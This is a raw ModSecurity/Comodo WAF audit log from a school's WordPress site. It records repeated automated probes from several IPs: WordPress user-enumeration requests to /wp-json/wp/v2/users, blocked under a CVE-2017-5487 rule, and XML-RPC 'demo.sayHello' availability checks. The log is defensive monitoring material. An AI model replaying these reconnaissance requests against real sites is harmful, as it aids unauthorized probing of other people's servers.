"/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460532827794 4906 (- - -) Stopwatch2: 1746460532827794 4906; combined=3913, p1=491, p2=3194, p3=26, p4=39, p5=95, sr=69, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68739876-Z-- --002dde00-A-- [05/May/2025:22:55:35 +0700] aBjfd_ZJDMuQndL03JNbAQAAAEM 103.236.140.4 40584 103.236.140.4 8181 --002dde00-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --002dde00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --002dde00-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460535892392 2264 (- - -) Stopwatch2: 1746460535892392 2264; combined=1179, p1=389, p2=760, p3=0, p4=0, p5=29, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --002dde00-Z-- --dbd2946f-A-- [05/May/2025:22:55:38 +0700] aBjfeoZWvR7-42f6JrALxgAAAMs 103.236.140.4 40610 103.236.140.4 8181 --dbd2946f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dbd2946f-C-- demo.sayHello --dbd2946f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dbd2946f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460538667250 5671 (- - -) Stopwatch2: 1746460538667250 5671; combined=3851, p1=561, p2=3055, p3=37, p4=36, p5=95, sr=74, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbd2946f-Z-- --a19c8569-A-- [05/May/2025:22:55:54 +0700] aBjfioZWvR7-42f6JrALygAAANQ 103.236.140.4 40734 103.236.140.4 8181 --a19c8569-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a19c8569-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a19c8569-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460554343358 2764 (- - -) Stopwatch2: 1746460554343358 2764; combined=1208, p1=406, p2=773, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a19c8569-Z-- --8ac2923f-A-- [05/May/2025:22:55:57 +0700] aBjfjYZWvR7-42f6JrALywAAAMA 103.236.140.4 40766 103.236.140.4 8181 --8ac2923f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8ac2923f-C-- demo.sayHello --8ac2923f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ac2923f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460557932886 5923 (- - -) Stopwatch2: 1746460557932886 5923; combined=4410, p1=551, p2=3625, p3=33, p4=34, p5=98, sr=73, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ac2923f-Z-- --70b1b510-A-- [05/May/2025:22:56:07 +0700] aBjflwRwKNFSM6B7_LafLwAAAIM 103.236.140.4 40856 103.236.140.4 8181 --70b1b510-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.157 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --70b1b510-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70b1b510-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460567841912 2486 (- - -) Stopwatch2: 1746460567841912 2486; combined=1209, p1=410, p2=769, p3=0, p4=0, p5=29, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70b1b510-Z-- --b501f155-A-- [05/May/2025:22:56:11 +0700] aBjfmwRwKNFSM6B7_LafNAAAAIg 103.236.140.4 40892 103.236.140.4 8181 --b501f155-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.157 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b501f155-C-- demo.sayHello --b501f155-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b501f155-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460571490070 5886 (- - -) Stopwatch2: 1746460571490070 5886; combined=4263, p1=536, p2=3472, p3=32, p4=35, p5=108, sr=73, sw=80, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b501f155-Z-- --3365db68-A-- [05/May/2025:22:56:27 +0700] aBjfq02V_h1VFAgsfgZ7mQAAAAw 103.236.140.4 41040 103.236.140.4 8181 --3365db68-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.213 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3365db68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3365db68-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460587829520 2956 (- - -) Stopwatch2: 1746460587829520 2956; combined=1261, p1=417, p2=813, p3=0, p4=0, p5=31, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3365db68-Z-- --008ed268-A-- [05/May/2025:22:56:30 +0700] aBjfrk2V_h1VFAgsfgZ7nQAAABI 103.236.140.4 41064 103.236.140.4 8181 --008ed268-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.213 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --008ed268-C-- demo.sayHello --008ed268-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --008ed268-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460590921178 5327 (- - -) Stopwatch2: 1746460590921178 5327; combined=4268, p1=537, p2=3529, p3=25, p4=28, p5=88, sr=70, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --008ed268-Z-- --992e4054-A-- [05/May/2025:22:56:39 +0700] aBjft02V_h1VFAgsfgZ7oAAAABM 103.236.140.4 41160 103.236.140.4 8181 --992e4054-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.79 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --992e4054-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --992e4054-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460599971498 2712 (- - -) Stopwatch2: 1746460599971498 2712; combined=1206, p1=408, p2=768, p3=0, p4=0, p5=29, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --992e4054-Z-- --bec9880f-A-- [05/May/2025:22:56:42 +0700] aBjfuvZJDMuQndL03JNbKAAAAFM 103.236.140.4 41188 103.236.140.4 8181 --bec9880f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.79 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bec9880f-C-- demo.sayHello --bec9880f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bec9880f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460602709713 6150 (- - -) Stopwatch2: 1746460602709713 6150; combined=4527, p1=542, p2=3560, p3=31, p4=92, p5=166, sr=74, sw=136, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bec9880f-Z-- --c6fe162e-A-- [05/May/2025:22:56:55 +0700] aBjfx4ZWvR7-42f6JrAL6wAAANg 103.236.140.4 41300 103.236.140.4 8181 --c6fe162e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c6fe162e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6fe162e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460615967378 3316 (- - -) Stopwatch2: 1746460615967378 3316; combined=1425, p1=480, p2=913, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6fe162e-Z-- --f875c965-A-- [05/May/2025:22:56:58 +0700] aBjfyoZWvR7-42f6JrAL8AAAAM8 103.236.140.4 41316 103.236.140.4 8181 --f875c965-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.61 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f875c965-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f875c965-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460618068089 2652 (- - -) Stopwatch2: 1746460618068089 2652; combined=1154, p1=405, p2=721, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f875c965-Z-- --2c70433e-A-- [05/May/2025:22:56:59 +0700] aBjfy02V_h1VFAgsfgZ7qgAAABE 103.236.140.4 41322 103.236.140.4 8181 --2c70433e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.17 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2c70433e-C-- demo.sayHello --2c70433e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c70433e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460619017471 5578 (- - -) Stopwatch2: 1746460619017471 5578; combined=4211, p1=524, p2=3462, p3=29, p4=34, p5=95, sr=72, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c70433e-Z-- --c2164646-A-- [05/May/2025:22:57:01 +0700] aBjfzU2V_h1VFAgsfgZ7rwAAABA 103.236.140.4 41352 103.236.140.4 8181 --c2164646-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.61 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c2164646-C-- demo.sayHello --c2164646-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2164646-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460621867827 6543 (- - -) Stopwatch2: 1746460621867827 6543; combined=4751, p1=645, p2=3868, p3=37, p4=40, p5=96, sr=80, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2164646-Z-- --ecf34a41-A-- [05/May/2025:22:57:13 +0700] aBjf2fZJDMuQndL03JNbPgAAAE0 103.236.140.4 41436 103.236.140.4 8181 --ecf34a41-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.15 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ecf34a41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecf34a41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460633032497 2495 (- - -) Stopwatch2: 1746460633032497 2495; combined=1208, p1=404, p2=774, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecf34a41-Z-- --115ae84d-A-- [05/May/2025:22:57:16 +0700] aBjf3PZJDMuQndL03JNbQAAAAEY 103.236.140.4 41468 103.236.140.4 8181 --115ae84d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.15 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --115ae84d-C-- demo.sayHello --115ae84d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --115ae84d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460636013348 5564 (- - -) Stopwatch2: 1746460636013348 5564; combined=4374, p1=506, p2=3631, p3=38, p4=35, p5=96, sr=73, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
